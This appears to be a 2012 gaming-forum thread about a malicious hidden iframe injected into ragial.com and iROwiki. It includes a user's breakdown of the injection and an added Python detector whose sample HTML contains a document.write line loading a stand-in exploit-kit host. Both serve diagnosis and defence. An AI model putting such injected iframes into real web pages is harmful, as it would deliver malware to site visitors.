Ragial.com - Trojan alert - Ragnarok Online Community Chat - WarpPortal Community Forums


Ragial.com - Trojan alert


69 replies to this topic

#1 Kalandros

Kalandros

    Too Legit To Quit

  • Members
  • 1476 posts
  • LocationQuébec
  • Playing:Ragnarok Online
  • Server:Yggdrasil

Posted 23 May 2012 - 09:15 PM

My ESET is going off and blocking my access to Ragial.com, stating there's a Trojan installed on it (possibly hacked into; it's happened on many other sites before with any small security flaw).

Threat: JS/Iframe.DK trojan
  • 0

#2 Superpass

Superpass

    Amateur Blogger

  • Members
  • 113 posts
  • Playing:Ragnarok Online
  • Server:Classic, Yggdrasil

Posted 23 May 2012 - 09:19 PM

I just went to ragial.com (after having the tab open for hours, mind you) and VIPRE had a pop-up saying:

"A known bad file was blocked from opening:
Program:
E4D6Bd01 (Exploit)"

It was attempting to modify the MD5 219a8faed9a602aba91f687fff019019, threat ID 4755606.

EDIT: Currently I am in the middle of a deep scan, I will let you know if I find anything interesting.

Edited by Superpass, 23 May 2012 - 09:22 PM.

  • 0

#3 Balthi

Balthi

    Awarded #1 Troll

  • RO Fungineering
  • 763 posts
  • LocationVeins, Arunafeltz
  • Playing:Ragnarok Online
  • Server:Chaos (Ygg), Classic

Posted 23 May 2012 - 09:22 PM

That's odd. I just had a conversation about the iROwiki setting off my antivirus as well. Oh dear...
  • 0

#4 Apocalis

Apocalis

    Amateur Blogger

  • Members
  • 100 posts
  • LocationMora
  • Playing:Ragnarok Online
  • Server:Chaos

Posted 23 May 2012 - 09:24 PM

Same probs with my virus prog.
It's odd.
  • 0

#5 Kalandros

Kalandros

    Too Legit To Quit

  • Members
  • 1476 posts
  • LocationQuébec
  • Playing:Ragnarok Online
  • Server:Yggdrasil

Posted 23 May 2012 - 09:30 PM

More headache for the GM team if people without enough security are infected, eh~
  • 0

#6 Sully

Sully

    Too Legit To Quit

  • Members
  • 1234 posts
  • LocationGreed Island
  • Playing:Nothing

Posted 23 May 2012 - 09:32 PM

It's the same for the iROwiki database.
  • 0

#7 Balthi

Balthi

    Awarded #1 Troll

  • RO Fungineering
  • 763 posts
  • LocationVeins, Arunafeltz
  • Playing:Ragnarok Online
  • Server:Chaos (Ygg), Classic

Posted 23 May 2012 - 09:33 PM

The best solution would probably be to take down both sites until the problems are fixed. The only factor is time -- dunno if the people who need to know are online at the moment, or not.

EDIT:

My antivirus ended up labeling whatever's in the wiki a Blackhole Exploit Kit. Woo.

Edited by Balthi, 23 May 2012 - 09:33 PM.

  • 0

#8 Ralis

Ralis

    [TOS] The Man Trap

  • VMod Retired
  • 6982 posts
  • LocationFlorida
  • Playing:Ragnarok Online
  • Server:Classic

Posted 23 May 2012 - 09:45 PM

I'm not coming up with anything, but looks like ragial and irowiki are down now.
  • 0

#9 Faolain

Faolain

    Awarded #1 Troll

  • Members
  • 680 posts
  • LocationCanada
  • Playing:Ragnarok Online
  • Server:All

Posted 23 May 2012 - 09:57 PM

Make sure to get some sort of Adblock addon for your browser. Sometimes information harvesting companies will inject viruses into ads that the computer tries to download.

I was on Ragial earlier, but only on Chrome, and I didn't get any popup. I have Adblock enabled.

Anyway please do post the results of the scan. :) And thanks for the heads up.
  • 0

#10 Superpass

Superpass

    Amateur Blogger

  • Members
  • 113 posts
  • Playing:Ragnarok Online
  • Server:Classic, Yggdrasil

Posted 23 May 2012 - 09:58 PM

Will do. I am also using Adblock+ for Firefox.
  • 0

#11 Bascojiin

Bascojiin

    Awarded #1 Troll

  • Members
  • 730 posts
  • Playing:Nothing

Posted 24 May 2012 - 12:13 AM

Time for another forced password change, I assume; if you get a Trojan via iRO Wiki, the Trojan will look for your RO passwords.

Here is a small guide to what I do when my antivirus detects a Trojan:

1. Save all needed files which I really don't want to lose and don't have a backup of yet, such as pictures and stuff
2. Format C:/ completely => Delete Windows!
3. Install Windows
4. Install security stuff
5. Update Windows & security stuff
6. Re-implement all the stuff I need and install games, etc.
7. Deep system scans with all security programs
8. Scandisk & Defrag of C:
9. Another deep system scan
BETWEEN STEP 6 & 9 => Change all my passwords to NEW(!!!) passwords which have not been used yet. I think a real-life notepad is OKAY to write PWs down; you may want to write them down in another system you can recognize, like PASSWORD => DROWSSAP or something, just in case someone breaks into your house, steals your notepad and is an RO player ;)
Remember: HAVING A NOTEPAD WITH PASSWORDS ON YOUR COMPUTER IS AN ABSOLUTE NO-GO!!!!
(Bad programs may check for .txt files on your Desktop or much-used files just to check if such a Password.txt file exists!)
----

In my opinion, if you get a Trojan it is always safer to just delete Windows and install it fresh, because you never know if there might be something hidden...

Edited by Bascojiin, 24 May 2012 - 12:20 AM.

  • 0

#12 Blueness

Blueness

    Amateur Blogger

  • Members
  • 443 posts
  • LocationNew Mexico
  • Playing:Nothing

Posted 24 May 2012 - 12:32 AM

There's really no need for that sort of panic unless you're running on a 10 year old machine that has never had a security update!

In any case, problem has been identified and is in the process of being fixed. It is clever enough to avoid being activated while you're using Chrome (which is why I didn't figure it out at first), Firefox just spit out an encoding error and IE 404'd and passed a webpage off to MSSE which ate it.

(Moral of the story, don't use IE!)

Feel free to run scans but I don't think it'll go much further than your temp folder. Clear your cache etc.
  • 0

#13 Bascojiin

Bascojiin

    Awarded #1 Troll

  • Members
  • 730 posts
  • Playing:Nothing

Posted 24 May 2012 - 12:34 AM

> There's really no need for that sort of panic unless you're running on a 10 year old machine that has never had a security update!
>
> In any case, problem has been identified and is in the process of being fixed. It is clever enough to avoid being activated while you're using Chrome (which is why I didn't figure it out at first), Firefox just spit out an encoding error and IE 404'd and passed a webpage off to MSSE which ate it.
>
> (Moral of the story, don't use IE!)
>
> Feel free to run scans but I don't think it'll go much further than your temp folder. Clear your cache etc.

So you got hacked, I assume?
Did any files get compromised, such as the user database of iRO Wiki or iRO Wiki Forums? Just asking because we all know some really smart people use their username/password on every site :D
  • 0

#14 Superpass

Superpass

    Amateur Blogger

  • Members
  • 113 posts
  • Playing:Ragnarok Online
  • Server:Classic, Yggdrasil

Posted 24 May 2012 - 12:44 AM

Bluedreams is right, you really shouldn't go about reinstalling your OS every time an antivirus spits out a warning. Clearing out your temp files and your cache is a good idea, and running a virus scan with your AV of choice and running Malwarebytes isn't a bad idea either. That being said, I ran Malwarebytes and came up with nothing, and my current scan with VIPRE is coming up with nothing as well. If you are running a decent AV, you should be fine with this one. We aren't talking about the next ILOVEYOU or Melissa here.

Just scan your computer, and if you are feeling a little paranoid change your passwords. And as always, this is a good time to remind you to use different passwords for each site, and don't store them on your computer.
  • 1

#15 fong

fong

    Too Legit To Quit

  • Members
  • 1070 posts
  • LocationBehind The Jail
  • Playing:Ragnarok Online
  • Server:Valkyrie

Posted 24 May 2012 - 12:45 AM

I play it with a computer server, but it looks like nothing happened with the firewall and anti-virus and anti-hack alert <.< So, not everyone is going to get attacked by that trojan??
  • 0

#16 Balthi

Balthi

    Awarded #1 Troll

  • RO Fungineering
  • 763 posts
  • LocationVeins, Arunafeltz
  • Playing:Ragnarok Online
  • Server:Chaos (Ygg), Classic

Posted 24 May 2012 - 12:47 AM

> I play it with a computer server, but it looks like nothing happened with the firewall and anti-virus and anti-hack alert <.< So, not everyone is going to get attacked by that trojan??

The trojan seems to only be attached to the iROwiki and ragial. The game itself shouldn't give you any trouble. It wasn't the game that had any issues.
  • 0

#17 Blueness

Blueness

    Amateur Blogger

  • Members
  • 443 posts
  • LocationNew Mexico
  • Playing:Nothing

Posted 24 May 2012 - 01:07 AM

Some glitch in an old version of phpMyAdmin that was running on a website I host (think 5+ years old) allowed code to be injected which tried to redirect the initial website request to another website to download malware.

Modern security software, working as intended, blocked anything from really happening on your side. Firefox simply failed with an encoding error, IE tried to redirect to the bad website and was halted by a combination of protections.

Whoever made the malware was smart enough to bypass Chrome completely so Google couldn't pick up on it! (meaning, if you use Chrome, the bad code never ran)

No user data on the irowiki side was compromised. The only compromise, as I said before, would be if you were running an ancient version of Windows XP with no security software.

http://www.microsoft...Name=JS/Blacole

Long story short, if Windows, Java, and Adobe Reader are up to date, nothing will happen :P

Edited by Bluedreams, 24 May 2012 - 01:16 AM.

  • 0

#18 TrashBag

TrashBag

    Amateur Blogger

  • Banned
  • 376 posts
  • Playing:Ragnarok Online
  • Server:Valkyrie

Posted 24 May 2012 - 01:09 AM

While we're at it, please delete ur sys32.
  • 0

#19 Heart

Heart

    Too Legit To Quit

  • Members
  • 2871 posts
  • LocationSofa so good
  • Playing:Ragnarok Online
  • Server:Classic

Posted 24 May 2012 - 01:25 AM

> Time for another forced password change, I assume; if you get a Trojan via iRO Wiki, the Trojan will look for your RO passwords.
>
> Here is a small guide to what I do when my antivirus detects a Trojan:
>
> 1. Save all needed files which I really don't want to lose and don't have a backup of yet, such as pictures and stuff
> 2. Format C:/ completely => Delete Windows!
> 3. Install Windows
> 4. Install security stuff
> 5. Update Windows & security stuff
> 6. Re-implement all the stuff I need and install games, etc.
> 7. Deep system scans with all security programs
> 8. Scandisk & Defrag of C:
> 9. Another deep system scan
> BETWEEN STEP 6 & 9 => Change all my passwords to NEW(!!!) passwords which have not been used yet. I think a real-life notepad is OKAY to write PWs down; you may want to write them down in another system you can recognize, like PASSWORD => DROWSSAP or something, just in case someone breaks into your house, steals your notepad and is an RO player ;)
> Remember: HAVING A NOTEPAD WITH PASSWORDS ON YOUR COMPUTER IS AN ABSOLUTE NO-GO!!!!
> (Bad programs may check for .txt files on your Desktop or much-used files just to check if such a Password.txt file exists!)
> ----
>
> In my opinion, if you get a Trojan it is always safer to just delete Windows and install it fresh, because you never know if there might be something hidden...

I have a notepad... on the laptop I don't connect to the internet =)
  • 0

#20 Superpass

Superpass

    Amateur Blogger

  • Members
  • 113 posts
  • Playing:Ragnarok Online
  • Server:Classic, Yggdrasil

Posted 24 May 2012 - 01:33 AM

Just finished scanning my entire system with multiple methods. Absolutely nothing of interest to report, if you have recent security patches and a modern AV installed then you have absolutely nothing to worry about.
  • 0

#21 Blueness

Blueness

    Amateur Blogger

  • Members
  • 443 posts
  • LocationNew Mexico
  • Playing:Nothing

Posted 24 May 2012 - 01:56 AM

I won't be able to fix the problem tonight as I'm waiting on a file transfer anyway, so the server is going to stay down while I get a little shut eye. I'll keep you posted!
  • 0

#22 Bascojiin

Bascojiin

    Awarded #1 Troll

  • Members
  • 730 posts
  • Playing:Nothing

Posted 24 May 2012 - 02:22 AM

But... but.. I CANT LIVE WITHOUT iRO QUEST GUIDE!!!! ARGH *kills herself*
  • 0

#23 Blueness

Blueness

    Amateur Blogger

  • Members
  • 443 posts
  • LocationNew Mexico
  • Playing:Nothing

Posted 24 May 2012 - 02:41 AM

Actually it is back up, some things may be broken like file uploads... please report any malware too.

Good night!
  • 0

#24 BoingBoing

BoingBoing

    Awarded #1 Troll

  • Members
  • 553 posts
  • Playing:Ragnarok Online

Posted 24 May 2012 - 04:09 AM

> Some glitch in an old version of phpMyAdmin that was running on a website I host (think 5+ years old) allowed code to be injected which tried to redirect the initial website request to another website to download malware.
>
> Modern security software, working as intended, blocked anything from really happening on your side. Firefox simply failed with an encoding error, IE tried to redirect to the bad website and was halted by a combination of protections.
>
> Whoever made the malware was smart enough to bypass Chrome completely so Google couldn't pick up on it! (meaning, if you use Chrome, the bad code never ran)
>
> No user data on the irowiki side was compromised. The only compromise, as I said before, would be if you were running an ancient version of Windows XP with no security software.
>
> http://www.microsoft...Name=JS/Blacole
>
> Long story short, if Windows, Java, and Adobe Reader are up to date, nothing will happen :P

This is not a new trick, but it is nifty. If you look at the source, the JavaScript at the top of the ragial page uses document.write to create a 10x10 invisible iframe. It then inserts the created div into the body. The actual src leads to http :heh: drjdrdjgyiuu :heh: myfw :heh: us. (malware infested, so .'s replaced with smiley)
As to why it "bypassed" Chrome, it didn't. It's the other way round. Just take a look at the actual script and where it is placed, and you'll see why it didn't load on WebKit-based browsers.
If you think about this sort of attack, it really isn't effective. Modern antivirus software that scans HTTP streams will recognize the JS code and catch it even before the page loads, and therefore even before it has a chance to insert the iframe (the JS code calls out <body> by id, so it can only run after everything before </body> has been loaded). This probably resulted in Firefox giving out 404's.
Interestingly, with the newest Firefox nightly, sandboxed iframes are introduced, which should annihilate this sort of malicious attack, if web devs choose to implement it.
  • 0
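The hidden-iframe injection BoingBoing describes above can be spotted by a static scan of the served HTML. The following is an added example, not code from this thread or from ragial.com: it flags tiny or CSS-hidden iframes and document.write() calls that inject one. The sample page, the hostnames and the size threshold are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not the real ragial.com source): a normal sandboxed iframe, a static 1x1 iframe, and a script that document.write()s a hidden 10x10 iframe.
SAMPLE_HTML = """<html><body id="body">
<iframe src="https://example.org/chart" sandbox="allow-scripts" width="600" height="300"></iframe>
<iframe src="http://tracker.invalid/p.gif" width="1" height="1"></iframe>
<script type="text/javascript">
document.write('<div><iframe src="http://exploit-kit.invalid/in.php" width="10" height="10" style="visibility:hidden"></iframe></div>');
</script>
</body></html>"""

TINY_PX = 20  # an iframe at or below this edge length is effectively invisible (constructed threshold)
HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none|left\s*:\s*-\d{3,}px", re.I)
# document.write(...) whose string argument contains an <iframe ... src=...> tag
DOC_WRITE_IFRAME = re.compile(r"document\.write\s*\([^;]*?<iframe[^>]*?src\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def iframe_reason(attrs):
    """Return why a static <iframe> looks hidden, or None if it looks ordinary."""
    a = {k.lower(): (v or "") for k, v in attrs}
    dims = [re.match(r"\s*(\d+)", a.get(n, "")) for n in ("width", "height")]
    if all(dims) and all(int(m.group(1)) <= TINY_PX for m in dims):
        return "tiny iframe ({}x{})".format(*(m.group(1) for m in dims))
    return "iframe hidden by inline CSS" if HIDDEN_CSS.search(a.get("style", "")) else None

class IframeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._script = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []  # start buffering the script body
        elif tag == "iframe":
            reason = iframe_reason(attrs)
            if reason:
                self.findings.append(("static", reason, dict(attrs).get("src", "")))
    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)  # the body may arrive in several chunks
    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            for m in DOC_WRITE_IFRAME.finditer("".join(self._script)):
                self.findings.append(("script", "document.write() injects an iframe", m.group(1)))
            self._script = None

def scan_html(html):
    """Return (kind, reason, src) tuples for every suspicious iframe in one page."""
    scanner = IframeScanner()
    scanner.feed(html)
    return scanner.findings
```

Run scan_html() over the HTML a server actually serves (or a saved copy of it); the ordinary sandboxed iframe produces no finding while the 1x1 and script-written ones do.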

#25 BoingBoing

BoingBoing

    Awarded #1 Troll

  • Members
  • 553 posts
  • Playing:Ragnarok Online

Posted 24 May 2012 - 04:16 AM

That is to say, you haven't taken out the malicious code at all, the exploit is still live on ragial.com.
  • 0
